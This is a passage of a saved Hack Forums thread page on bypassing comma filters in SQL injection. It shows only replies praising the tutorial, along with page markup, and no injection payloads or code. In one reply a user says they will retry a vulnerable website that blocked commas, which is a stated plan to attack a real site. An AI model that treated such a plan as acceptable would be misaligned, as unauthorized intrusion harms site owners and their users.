src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/master-donator.png" alt="Master Donator" title="Master Donator"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/scientist.png" alt="Mad Scientist" title="Mad Scientist"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/sticky-bro.png" alt="Sticky Man" title="Sticky Man"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29067860">Nice tutorial for new members, good job as usual!</div><div class="post_meta" id="post_meta_29067860"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1181919" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29067860" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29070351" id="pid29070351"></a><table class="tborder" style="margin-top: 5px; " id="post_29070351" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-22-2012, 06:10 PM <span id="edited_by_29070351"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29070351#pid29070351">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/0fa0f9ce54eb150d907f3e0e35a039cf.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><span class="group2">hackforumspang</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Sardaukar<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 60<br>Posts: 1,897<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1241186"><strong class="reputation_positive">115</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29070351">Nice
 tutorial. I knew a small bit about this. Never really ran in to it that
 much as a problem. Good job showing the various bypass ways though <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_29070351"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1241186" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a> </div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29070351" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29078648" id="pid29078648"></a><table class="tborder" style="margin-top: 5px; " id="post_29078648" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-23-2012, 02:16 AM <span id="edited_by_29078648"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29078648#pid29078648">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1457333"><span class="group2">kimsonha</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 13<br>Posts: 165<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1457333"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29078648">Nice tutorial bro!<br>You always make me suprise about your knowledge.<br>Thank you in advance.</div><div class="post_meta" id="post_meta_29078648"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1457333" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29078648" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29078674" id="pid29078674"></a><table class="tborder" style="margin-top: 5px; " id="post_29078674" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-23-2012, 02:18 AM <span id="edited_by_29078674"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29078674#pid29078674">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=852536"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/avatar_852536.jpg" alt="" height="100" width="85"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=852536"><span class="group9">Suved</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Living Normal LIFE<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 53<br>Posts: 855<br>Joined: Jun 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=852536"><strong class="reputation_positive">39</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29078674">HQ Tutorial.<br>well written tut<br>Thanks for tutorial.</div><div class="post_meta" id="post_meta_29078674"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=852536" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29078674" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29079697" id="pid29079697"></a><table class="tborder" style="margin-top: 5px; " id="post_29079697" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-23-2012, 03:38 AM <span id="edited_by_29079697"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29079697#pid29079697">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1406490"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/tumblr_liub5s_Gkby1qi06hno1_500_thumb.jpg" alt="" height="84" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1406490"><span class="group9">p0pc0rn</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"> <br><span class="smalltext">&lt;3 Zixem<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 33<br>Posts: 687<br>Joined: Jul 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1406490"><strong class="reputation_positive">45</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29079697">who's Syed btw? HF member or he/she is someone that you know?<br>if he/she not from HF and have twitter or some blog,care to PM it to me? :D</div><div class="post_meta" id="post_meta_29079697"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1406490" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29079697" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29080494" id="pid29080494"></a><table class="tborder" style="margin-top: 5px; " id="post_29080494" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-23-2012, 04:34 AM <span id="edited_by_29080494"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29080494#pid29080494">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=663638"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/avatar_663638.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=663638"><span class="group29">SP4M</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Because life is that boring<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 75<br>Posts: 766<br>Joined: Feb 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=663638"><strong class="reputation_positive">164</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29080494">This is a nice thread bro.<br><br>Well done</div><div class="post_meta" id="post_meta_29080494"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=663638" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29080494" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29080990" id="pid29080990"></a><table class="tborder" style="margin-top: 5px; " id="post_29080990" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-23-2012, 05:05 AM <span id="edited_by_29080990"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29080990#pid29080990">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1468706"><span class="group0">Apple J4ck.</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Fremen<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/strange.gif" alt="*#@?&amp;%!" title="*#@?&amp;%!"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 472<br>Posts: 4,208<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1468706"><strong class="reputation_positive">933</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/donator.png" alt="Emerald Donator" title="Emerald Donator"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/brony.png" alt="Brony" title="Brony"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/master-donator.png" alt="Master Donator" title="Master Donator"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/cute.png" alt="Cuddly and Cute" title="Cuddly and Cute"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/symbol-dollar_24.png" alt="Rich Bitch" title="Rich Bitch"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/liberty-reserve.png" alt="Liberty Reserve Head" title="Liberty Reserve Head"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/bitcoin.png" alt="Bitcoinage" title="Bitcoinage"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/gift.png" alt="Gift" title="Gift"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29080990">Great tutorial buddy.<br>some of them helped me ;3</div><div class="post_meta" id="post_meta_29080990"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1468706" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29080990" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29081563" id="pid29081563"></a><table class="tborder" style="margin-top: 5px; " id="post_29081563" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-23-2012, 05:38 AM <span id="edited_by_29081563"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;pid=29081563#pid29081563">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1514625"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/fR7dZjC.jpg" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1514625"><span class="group2">MireX</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 14<br>Posts: 326<br>Joined: Oct 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1514625"><strong class="reputation_positive">13</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29081563">Nice tutorial <img src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br>I found a vuln website a while that blocked the commas... Now I'll try it again.</div><div class="post_meta" id="post_meta_29081563"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1514625" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000&amp;replyto=29081563" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (5):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=4" class="pagination_page">4</a> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=5" class="pagination_page">5</a> <a href="http://www.hackforums.net/showthread.php?tid=3116000&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3116000" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3116000">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3116000" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3116000&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3116000.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BTutorial%5D%20SQLi%20-%20when%20commas%20are%20blocked%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->